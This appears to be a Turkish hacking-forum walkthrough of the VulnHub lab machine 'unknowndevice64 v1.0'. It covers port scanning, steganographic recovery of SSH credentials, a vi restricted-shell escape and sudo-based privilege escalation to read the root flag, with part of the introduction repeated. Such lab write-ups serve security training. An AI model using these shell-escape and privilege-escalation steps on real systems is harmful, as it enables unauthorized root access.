unknowndevice64 v1.0: VulnHub
Merhabalar, değerli Türk Hack Team ailesi bu gün sizlere "unknowndevice64 v2.0: VulnHub Zafiyetli Makine Çözümü" konusunu anlatacağım.
İsim: unknowndevice64 v1.0: VulnHub
Çıkış Tarihi: 9 Mar 2019
Zorluk: Başlangıç
Açıklama: "Root Erişimini Almak"
Hedef: flag.txt
Seri: unkowndevice64
Öncelikle zafiyetli makinemizin ip adresini öğrenebilmek için terminale netdiscover yazıyoruz.
Ardından nmap ile tarama yapıyoruz ve sonucunda iki adet "1337 ve 31337" portlarının açık olduğunu görüyoruz.
Merhabalar, değerli Türk Hack Team ailesi bu gün sizlere "unknowndevice64 v2.0: VulnHub Zafiyetli Makine Çözümü" konusunu anlatacağım.
unknowndevice64-v1.0
İsim: unknowndevice64 v1.0: VulnHub
Çıkış Tarihi: 9 Mar 2019
Zorluk: Başlangıç
Dosya Boyutu: 282-mb/280-mb
Açıklama: "Root Erişimini Almak"
Hedef: flag.txt
Seri: unkowndevice64
unknowndevice64 v1.0 Zafiyetli Makine Çözümü
Öncelikle zafiyetli makinemizin ip adresini öğrenebilmek için terminale netdiscover yazıyoruz.
Ardından nmap ile tarama yapıyoruz ve sonucunda iki adet "1337 ve 31337" portlarının açık olduğunu görüyoruz.
Kod:
nmap -A 192.168.204.129
Ardından "31337" portu üzerinden anasayfamıza bir göz atıyoruz.
Ardından anasayfamızda "h1dd3n" kelimemizin gizlendiğini görüyoruz. Ardından sayfamızın kaynak kodlarına göz atıyoruz.
Ardından kaynak kodlarında bulduğumuz "key_is_h1dd3n.jpg" dosyasını tarayıcımızda açıyoruz.
Daha sonrasında bilgisayarımıza bu resim dosyasını kaydediyoruz.
Ardından dosyayı kaydettiğimiz konuma geçiyoruz ve ve aşağıdaki kodu terminalimize yazıyoruz.
Kod:
steghide extract -sf key_is_h1dd3n.jpg
Ardından karşımıza bir metin dosyası çıkıyor. Aşağıdaki kod ile dosyayı okuyoruz ve çıkan metini dönüştürücüye atıyoruz.
Kod:
cat h1dd3n.txt
Ardından kullanıcı adımız ve şifremiz karşımıza çıkıyor.
Kod:
Username: ud64
Password: 1M!#64@ud
Ardından makinemize 1337 portu ile giriş yapıyoruz ve aşağıdaki komutları yazıyoruz.
Kod:
ssh [email protected] -p 1337
Daha sonrasında sırasıyla "id, ls, echo $SHELL, echo $PATH, export SHELL=/bin/bash:$SHEL, export PATH=/usr/bin:$PATH" yazıyoruz.
Kod:
id
Kod:
ls
Kod:
echo $SHELL
Kod:
echo $PATH
Kod:
export SHELL=/bin/bash:$SHEL
Kod:
export PATH=/usr/bin:$PATH
Ardından terminale "vi" yazıyoruz.
Kod:
vi
Ardından gelen sayfada gerekli kısıma giriş yapmak için aşağıdaki kodu giriyoruz.
Kod:
:!/bin/bash
Ardından gerekli komutları yazıyoruz ve "su" izni olmadan giriş yapabileceğimizi öğreniyoruz.
Kod:
export PATH=/usr/bin:$PATH
Kod:
export SHELL=/bin/bash:$SHELL
sudo -l
Ardından sudo ile aşağıdaki kodu çalıştırıyoruz.
Kod:
sudo sysud64 -h | less
Ardından "sh" içerisinden çalıştırmamız gereken satırlar olduğundan dolayı aşağıdaki komutu yazıyoruz.
Kod:
sudo sysud64 -o /dev/null /bin/sh
Ardından sırasıyla "id, ls, cd /root, ls" yazıyoruz. Ardından flag dosyamız karşımıza çıkıyor. Dosyamızı aşağıdaki komutla okuyoruz.
Kod:
cat flag.txt
Evet Türk Hack Team ailesi konum bu kadar. Bir sonraki konumda görüşmek üzere. Esenlikler.
Son düzenleme: